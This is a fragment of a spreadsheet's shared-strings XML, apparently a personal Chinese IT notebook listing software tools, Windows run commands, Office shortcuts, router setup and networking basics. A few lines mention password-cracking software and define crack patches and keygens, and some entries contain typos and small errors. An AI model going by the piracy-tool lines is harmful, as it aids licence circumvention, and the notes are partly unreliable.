  </si>
  <si>
    <t>文件压缩工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文档阅读工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件备份工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件修复工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件改名工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件切割工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文档格式转换工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Total Commander;Turo Browser;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WinARA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Acrobat Reader</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Disk2disk</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>EasyRecovery</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MPS自动改名器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件切割机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>防火墙软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>杀毒软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>恶意软件清理工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>天网防火墙软件，ARP防火墙；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>360安全卫士，windows defender;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NOD,瑞星，卡巴斯基；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PS，coredraw,3DMax，CAD;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网上炒股软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>地图工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>理财工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>同花顺行情软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>中国电子地图2007,Google earth;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>家庭理财精锐版；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IE修复</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注册表修复</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>智能化内存管理工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>端口诊断</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IE修复大师</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注册表医生V4.0</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>RAM医生</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows端口诊断专家</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>多功能密码破解软件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Virtual PC;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软件工具分类</t>
  </si>
  <si>
    <t>文件index.html在I盘无法保存；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 查看I盘属性，发现：everyone所有者权限：不是完全控制；高级的所有者：当前所有者不是现有帐户；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 ---编辑---点击当前帐户名称---确定</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 更改权限---完全控制；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 磁：硬盘、软盘、磁带；磁头读取磁粒子表现的南北极翻译成0,1；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 光：光盘；激光头发出激光身到光盘的有特殊颜料的凹凸面反射回后识别成0,1；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如何更改系统显示语言：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 旗舰版支持更换语言，其他版本需另外下载工具；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 控制面板---更改语言---安装语言---launch updates---选择语言---安装；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 如果安装了多种语言，可以：change display language:choose a display language;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>winword</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>services.msc</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开word</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>启动服务管理窗口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开安全中心</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>inetcpl.cpl</t>
  </si>
  <si>
    <t>打开internet选项；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>control</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开控制面板；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>control system</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开系统属性对应框；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>位置：c:\windows\system32</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>常见故障解决记录与技巧</t>
  </si>
  <si>
    <t>禁止特定软件运行</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>win+R---secpol.msc:打开“本地安全策略”控制台---软件限制策略；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>win+R</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>taskmgr</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对开任务管理器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>netstat</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>查看端口；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>secpol.msc</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开“本地安全策略”控制台</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数字信号：digital signal在时间轴上是离散（不连续）的，数值幅度不变（0、1）；模拟信号接口：S-video输入接口、VGA；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>模拟信号：analog signal在时间轴上是连续的，数值幅度不断变化；数字信号接口：IEEE1394接口、DVI接口，USB接口；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>返回至前一网页</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ctrl++</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ctrl+B</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ctrl+D</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ctrl+H</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开历史记录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ctrl+I(Alt+A)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开收藏夹</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ctrl+N</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开新窗口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ctrl+W</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>关闭当前窗口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>EsC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>停止下载Web页</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F10</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>向文档起始处翻页</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>↑</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>↓</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F11</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在全屏幕和常规浏览器窗口之间进行切换</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IE浏览</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shift+space</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>向上滚屏，相当于PaDn;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ctrl+shift++</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>上标</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>excel</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ctrl+pgdn</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在工作簿中向右翻动工作表；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shift+F9</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如果有设置成手动重算，按shift+R9可进行手动重算；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>wscui.cpl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Modem网络连接</t>
  </si>
  <si>
    <t>Modem网络连接</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>目前可供选择的服务：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ISP：主要有电信（16300），联通（16500），网通（16900），取决于家里所使用电话的管理部门，（电话线必须能拨打ISP客服电话，169,263等）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>宽带路由器设置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>宽带路由器R设置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R出厂前都有一个默认的IP（具体查看说明书），如192.168.1.1；设置之前需要将PC的IP设置与路由器的IP在同一网络内；如192.169.1.2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R与PC连接；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在PC上打开IE，在地址址栏输入http://192.168.1.1,访问R；进入R的配置界面（如同访问局域网内的另一台Pc);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LAN口设置：设置一个IP地址，如：192.168.1.1；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WAN口设置：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.1 连接类型：PPPoE；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.2 上网帐号和口令；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.3 连接模式：自动或手动；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.4 查看运行状态：可看到WAN IP和DNS服务器：61.139.2.69；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务器以及客户机的网络设置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>6.1 IP地址：192.168.1.*；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>6.2 子网掩码：255.255.255.0</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>6.3 默认网关：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>6.4 192.168.1.1（路由器LAN口的IP地址）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>宽带路由器是传统路由器的简化产品，集成了路由口碑 NAT拨号、防火墙、带宽控制和管理等功能，并集成10/100mbps/s宽带以太网WAN接口，并内置多口10/100mbps/s自适应交换机，方便多台机器在接入内部网络和internet;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络硬件</t>
  </si>
  <si>
    <t>网络硬件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.1 数据编码、解码、发送、接收、传输、数据帔的建立；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.1.1 定义二进制数据：如+-5v表示0,+-10v表示1,两个网卡在1秒钟内同同一秒钟内传递1Mb，则网速为1Mb/s</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.2 介质访问控制；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.3 并行/串行转换；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>双绞线和水晶头的针脚实现了双向公路（1、3号线负责传送 ，2、6号线负责接收），扭成对的电缆可以避免电磁干扰，减少数据传输错误，双绞线也避免了一条信号线容易重叠和含义容易搞混淆的情形；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.1 实现PC互联，构建LAN，隔离广播域，扩充网络接口；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.2 交换机可以学习MAC地址，并把其存放在内部MAC地址表中；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.1.2 数据帧是网络的合法数据，包括目标地址、源地址、数据、数据包是TCP/IP传输的基本单元（64-1518b)</t>
  </si>
  <si>
    <t>共享局域通信，对每个被发送的数据帧它都会转发到他所有的端口，与它连接的PC会检查这个帧的目标地址，相符就处理，不相符就丢掉，这样就形成了一个广播域（集线器在某个时刻只允许一台设备发送帧）；</t>
  </si>
  <si>
    <t>4.3 独享带宽：允许多台设备同时传送帧，且支持双工方式；</t>
  </si>
  <si>
    <t>4.4 转发决定：把帧的目标地址和MAC地址表做比较，如果在地址表中不存在则转发给网关，如果存在，则直接转发给地址表内对应的端口；</t>
  </si>
  <si>
    <t>4.5 过滤决定：交换机不会把帧转发到不对应的端口，相当于过滤掉了这个帧（对于没被发送的端口）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.6 路由交换机（第三层交换机）：在计算机数量众多的局域网中，为了提高网络的安全性和通信效率必须划分VLAN，而不同的VLAN间的通信只能通过路由设备实现，传统的路由设备吞吐量太小而难以适应大规模、高速率网络传输的需要，于是专门用于解决VLAN之间通信，集第三层转发与第二层交换于一身的第三交换技术产生了。第三层交换机实际是使用了集成电路的路由器；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.1 实现网络互联，internet共享，构建WAN，隔离LAN；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.2 路由器有两个IP地址，一个是合法的广域网的WAN中的IP地址，默认网关由其ISP商提供（用于IP包转发）；一个是LAN的私有地址，是其下属的网关；通过两个口，两个地址实现NAT，Network Address Transfer;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.3 路由选择首先从需要发送包的主机计算开始，主机首先查看自己的ARP Cache(Address Resolution Protocol地址解析协议），其中列出了同一子网的IP地址，还有对应的以太网MAC地址，Medium Access Control,如果目标地址在同一子网内，主机只需直接把包发送给目标主机，而忽略缺省网关，如果不是，则把包使用ARP来广播请求，希望得到一个包含缺省信息的应答，路由器接收到目标地址为自己的MAC地址的以太网数据帧，如果这个帧没有错误，路由器就会对帧的IP地址进行解封装；（数据包携带的源地址与路由器LAN口地址在同一网段）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.5 没有子网的路由器（拥有所有IP网络的列表）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    有子网的路由器（拥有一个所有IP子网的列表）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.7 路由器其实是一台拥有功能强大的软件（internet OS)的专用计算机，可以听懂并翻译各种网络协议；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.4 路由器检查自己的NAT地址转换表，会用WAN口IP地址，替换包里数据表内的源地址，数据表就会使用公网地址访问IE；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.6 路由器根据IP包的目标地址查找路由表，根据结果将IP包转发给对应端口，下一台路由器继续转发，对于无法判断目的地的IP地址，传给默认网关路由器；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.8 宽带路由器：集中了交换机和路由器的功能，一般拥有4个以太网口。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>6.1 通过代理服务器可以共享入网</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>6.2 收到的IP包会形成缓存，如果有客户机访问相同的信息时，就可以直接从缓存中得到；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>实现互联限制，构建安全网络、隔离网络；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>通过监测、限制、更改跨越防火墙的数据流，尽可能对外屏蔽网络内部的信息、结构和运行状况；有选择地接受外部访问；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>防火墙的工作原理：网络通信的基本单位：数据包，包含源IP地址和端口号以及目标IP地址和端口号；IP地址表明了电脑在网络中的位置，而端口号则表示要使用机器上的某种服务或会话；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>首选DNS服务器：61.139.2.69（查看路由器的运行状态可知）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.1 上网直通车（以叫主讲计费形式），</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用户输入的帐户和密码都是上述号码。中国电信96169上网直通车，直拨不需办理帐号申请，广东0.08元/分的网络和通信费，与电话费一起支付；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2 注册用户业务（预付费形式）：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用户去营业厅（或通过电话、互联网）注册并获得专用帐号和码；广东网络使用费0.03/分，从帐户中扣除，通信费0.02/分与电话费一起支付；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.3 使用上网卡业务：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如中国电信16300上网卡，有计时卡、包月卡、半年卡、年卡，使用的网络费用不一，广东计时卡网络使用费0.05/分，通信费为0.02/分，卡上有一个帐号和密码，然后使用PSTN或ISDN电话拨号：网络和internet---连接到internet---拨号；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>序号</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>大类</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>中类</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>明细</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>a 破解补丁：绕过注册码验证的部分，就能全部使用软件的功能；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>b 注册机：破解软件注册的“算法”，</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>它连接的原理是使用即时消息或电子邮件邀请他人连接到我们的计算机上，当建立连接后，这个人就能在远处查看及控制我们的计算机了。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>命令类别</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统文件检查程序：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>SFC /scannow;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>病毒或安装未经微软验证的软件，提示系统无法识别；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统无法启动和无法正常启动某些系统功能；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬件配置不当或软件使用不当或系统文件丢失或病毒入侵；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>程序的动态链接文件损坏；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 进入安全模式
手动修复</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">winver </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">winver </t>
  </si>
  <si>
    <t>CMD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">at </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看所有的计划任务</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>查看所有的计划任务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>at</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CMD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net user</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>查看有哪些用户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net user 帐户名</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>查看帐户的属性</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net view</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>查看本地局域网内开启了哪些共享</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net view \\ip</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>查看对方局域网内开启了哪些共享</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">net config </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显示系统网络设置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>net logoff</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>断开连接的共享</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无敌删除命令（任何无法删除的文件都能删除）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>实现WORD双面打印的简便方法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>货币型数据取值的范围是</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>:-922337203685477.5807</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>922337203685477.5807</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数值型数据取值的范围是：-0.9999999999E+19～0.9999999999E+20</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>属性值的设置或修改可以通过属性窗口来进行，也可以通过编程的方法在程序运行的时候来改变对象的属性。在程序中设置属性的一般格式是</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>:</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表单名</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对象名</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>属性名＝属性值</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>11</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF28386C"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、另外，保留着</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF28386C"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>\windows\help</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF28386C"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录下的东西对我来说是一种伤害！</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网上流行的“清理系统垃圾文件代码”如下：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>怎样修改Word模板：让每次新建的文档都是你所要求的格式：如页边距、页眉等；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>选择性粘贴：图片（增强性图元文件）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>下标：ctrl+"+";（当在中文输入状态下时，此快捷键可能存在冲突，可置换到英文输入法状态下，再按些快捷键操作即可；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在Word中播放MP3音乐的方法其实很简单，用户打开Word程序，在其菜单栏中选择“插入→ 对象”选项，接着在弹出的“对象”对话框中选择“由文件创建”选项卡，在该选项卡中单击“浏览”按钮并通过文件夹切换选中需要播放的MP3音乐文件，单击“插入”按钮返回到“对象”对话框（如图1），在“对象”对话框中单击“确定”，这时大家会看到在当前打开的Word文档中多了一个含有MP3音乐文件名的图标，用户只要双击那个图标，无限美妙的音乐旋律即可立即回响。</t>
  </si>
  <si>
    <t>在Word中播放Flash动画的操作方法与播放视频有些类似。用户按照上面的方法在“其它控件”列表中选择“Shockwave Flash Object”选项，这时在Word中同样会弹出一个用于播放Flash动画的矩形区域，用户在该区域中单击鼠标右键，选择“属性”选项，在Word随后弹出的“属性”对话框中用户需要找到“Movie”选项，同样用户可以在该选项右侧的空白框中手工输入需要播放Flash动画的绝对路径及文件名，这里需要特别注意的是：在输入的文件名后面需要加输“.swf”文件名后缀。进行完上述所有设置后，用户返回到Word主界面并在Word的“控件工具箱”窗口中单击“退出设计模式”按钮即可进行Flash动画的播放了。</t>
  </si>
  <si>
    <t>将Word变为无所不能的播放器</t>
  </si>
  <si>
    <t>将Word变为无所不能的播放器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>word</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
